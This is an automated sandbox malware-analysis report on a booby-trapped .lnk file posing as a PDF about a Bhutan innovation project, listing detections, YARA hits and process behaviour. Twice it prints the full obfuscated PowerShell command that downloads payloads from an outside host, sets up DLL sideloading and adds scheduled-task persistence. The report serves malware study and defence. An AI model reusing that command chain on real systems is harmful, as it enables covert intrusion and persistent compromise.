NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027c8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027c9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050ed000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050ee000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050ef000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\Large_Innovation_Project_for_Bhutan.pdf.lnk

Creates a suspicious process (3 events)

cmdline	"C:\Windows\system32\schtasks.exe" /create /Sc minute /Tn MicroUppdate /tr C:\Users\Public\Winver
cmdline	"C:\Windows\system32\schtasks.exe" /create /Sc minute /Tn MicroUpdate /tr C:\Users\Public\resmon
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w""i 1 $ProgressPreference = 'SilentlyContinue';i''w''r https://adaptation-funds.org/documents/Large_Innovation_Project_for_Bhutan.pdf -OutFile C:\Users\Public\Large_Innovation_Project_for_Bhutan.pdf;s''a''p''s C:\Users\Public\Large_Innovation_Project_for_Bhutan.pdf;i''w''r https://beijingtv.org/wpytd52vDw/brtd2389aw -OutFile "C:\Users\Public\hal";r''e''n -Path "C:\Users\Public\hal" -NewName "C:\Users\Public\edputil.dll";i''w''r https://beijingtv.org/ogQas32xzsy6/fRgt9azswq1e -OutFile "C:\Users\Public\sam";r''e''n -Path "C:\Users\Public\sam" -NewName "C:\Users\Public\Winver.exe";c''p C:\Windows\System32\resmon.exe C:\Users\Public\resmon.exe;c''p''i 'C:\Users\Public\Large_Innovation_Project_for_Bhutan.pdf' -destination .;sch''ta''s''ks /c''r''e''a''te /Sc minute /Tn MicroUpdate /tr 'C:\Users\Public\resmon';sch''ta''s''ks /c''r''e''a''te /Sc minute /Tn MicroUppdate /tr 'C:\Users\Public\Winver';e''r''a''s''e *d?.?n?

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 9, 2024, 11:17 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	"C:\Windows\system32\schtasks.exe" /create /Sc minute /Tn MicroUppdate /tr C:\Users\Public\Winver
cmdline	"C:\Windows\system32\schtasks.exe" /create /Sc minute /Tn MicroUpdate /tr C:\Users\Public\resmon
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w""i 1 $ProgressPreference = 'SilentlyContinue';i''w''r https://adaptation-funds.org/documents/Large_Innovation_Project_for_Bhutan.pdf -OutFile C:\Users\Public\Large_Innovation_Project_for_Bhutan.pdf;s''a''p''s C:\Users\Public\Large_Innovation_Project_for_Bhutan.pdf;i''w''r https://beijingtv.org/wpytd52vDw/brtd2389aw -OutFile "C:\Users\Public\hal";r''e''n -Path "C:\Users\Public\hal" -NewName "C:\Users\Public\edputil.dll";i''w''r https://beijingtv.org/ogQas32xzsy6/fRgt9azswq1e -OutFile "C:\Users\Public\sam";r''e''n -Path "C:\Users\Public\sam" -NewName "C:\Users\Public\Winver.exe";c''p C:\Windows\System32\resmon.exe C:\Users\Public\resmon.exe;c''p''i 'C:\Users\Public\Large_Innovation_Project_for_Bhutan.pdf' -destination .;sch''ta''s''ks /c''r''e''a''te /Sc minute /Tn MicroUpdate /tr 'C:\Users\Public\resmon';sch''ta''s''ks /c''r''e''a''te /Sc minute /Tn MicroUppdate /tr 'C:\Users\Public\Winver';e''r''a''s''e *d?.?n?

Installs itself for autorun at Windows startup (2 events)

cmdline	"C:\Windows\system32\schtasks.exe" /create /Sc minute /Tn MicroUppdate /tr C:\Users\Public\Winver
cmdline	"C:\Windows\system32\schtasks.exe" /create /Sc minute /Tn MicroUpdate /tr C:\Users\Public\resmon

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\Large_Innovation_Project_for_Bhutan.pdf.lnk

File has been identified by 14 AntiVirus engines on VirusTotal as malicious (14 events)

VIPRE	Heur.BZC.YAX.Boxter.800.DC667690
Arcabit	Heur.BZC.YAX.Boxter.800.DC667690
ESET-NOD32	LNK/TrojanDownloader.Agent.BNW
BitDefender	Heur.BZC.YAX.Boxter.800.DC667690
MicroWorld-eScan	Heur.BZC.YAX.Boxter.800.DC667690
Emsisoft	Heur.BZC.YAX.Boxter.800.DC667690 (B)
FireEye	Heur.BZC.YAX.Boxter.800.DC667690
Sophos	Mal/DownLnk-D
Google	Detected
MAX	malware (ai score=86)
GData	Heur.BZC.YAX.Boxter.800.DC667690
VBA32	Trojan.Link.ShellCmd
Zoner	Probably Heur.LNKScript
Fortinet	LNK/Agent.D!tr

One or more non-whitelisted processes were created (3 events)

parent_process	powershell.exe	martian_process	"C:\Windows\system32\schtasks.exe" /create /Sc minute /Tn MicroUppdate /tr C:\Users\Public\Winver
parent_process	powershell.exe	martian_process	"C:\Windows\system32\schtasks.exe" /create /Sc minute /Tn MicroUpdate /tr C:\Users\Public\resmon
parent_process	powershell.exe	martian_process	C:\Users\Public\Large_Innovation_Project_for_Bhutan.pdf

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2580 resumed a thread in remote process 2692
NtResumeThread July 9, 2024, 11:17 a.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2692	1	0	0

The process powershell.exe wrote an executable file to disk (21 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Windows\System32\schtasks.exe

Large_Innovation_Project_for_Bhutan.pdf.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All